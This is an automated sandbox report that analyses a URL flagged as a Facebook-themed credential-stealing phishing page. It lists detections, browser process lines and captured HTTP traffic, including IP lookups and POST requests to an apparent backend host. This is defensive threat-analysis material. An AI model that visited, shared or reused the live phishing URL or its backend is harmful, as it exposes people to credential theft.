Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/

Overview

General Information

Sample URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/
Analysis ID:1415410
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Phishing site detected (based on favicon image match)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 6292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1904,i,7492219520878675304,2440813049472700085,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Phishing

barindex
Source: https://amplifyapp.comMatcher: Template: facebook matched with high similarity
Source: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/Matcher: Template: facebook matched with high similarity
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.242.90
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/chunk-vendors.401e5810.js HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/app.1aceff02.css HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/app.94aec170.js HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /css/montserrat?styles=17402 HTTP/1.1Host: fonts.cdnfonts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/fa-regular-400.b041b1fa4fe241b23445.3580b4a9.woff2 HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fonts/fa-solid-900.b6879d41b0852f01ed5b.fd0b155c.woff2 HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /app/0d3b34df0b6b9220c260?protocol=7&client=js&version=8.0.2&flash=false HTTP/1.1Host: ws-eu.pusher.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: SQ76rLgsFcIl2RzvyhmqlQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /s/14883/Montserrat-Regular.woff HTTP/1.1Host: fonts.cdnfonts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fonts.cdnfonts.com/css/montserrat?styles=17402Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/fetch/ban HTTP/1.1Host: disenx.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: isuecenter.dig4pnjky2v0q.amplifyapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/fetch/ban HTTP/1.1Host: disenx.onlineConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Bx8gPCgPUcp42UL&MD=5RhX4v+r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Bx8gPCgPUcp42UL&MD=5RhX4v+r HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /pusher/app/0d3b34df0b6b9220c260/265/cis4qcvf/xhr_streaming?protocol=7&client=js&version=8.0.2&t=1711393641468&n=1 HTTP/1.1Host: sockjs-eu.pusher.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownDNS traffic detected: queries for: isuecenter.dig4pnjky2v0q.amplifyapp.com
Source: unknownHTTP traffic detected: POST /api/fetch/ban HTTP/1.1Host: disenx.onlineConnection: keep-aliveContent-Length: 9sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*Content-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_58.2.drString found in binary or memory: https://flareapp.io/docs/ignition-for-laravel/security
Source: chromecache_55.2.drString found in binary or memory: https://fontawesome.com
Source: chromecache_55.2.drString found in binary or memory: https://fontawesome.com/license/free
Source: chromecache_55.2.drString found in binary or memory: https://fonts.cdnfonts.com/css/montserrat?styles=17402);
Source: chromecache_57.2.drString found in binary or memory: https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff)
Source: chromecache_55.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:ital
Source: chromecache_58.2.drString found in binary or memory: https://github.com/spatie/ignition/issues/new?title=$
Source: chromecache_63.2.drString found in binary or memory: https://pusher.com/
Source: chromecache_58.2.drString found in binary or memory: https://tailwindcss.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.221.242.90:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: classification engineClassification label: mal56.phis.win@16/28@22/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1904,i,7492219520878675304,2440813049472700085,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://isuecenter.dig4pnjky2v0q.amplifyapp.com/#/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1904,i,7492219520878675304,2440813049472700085,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
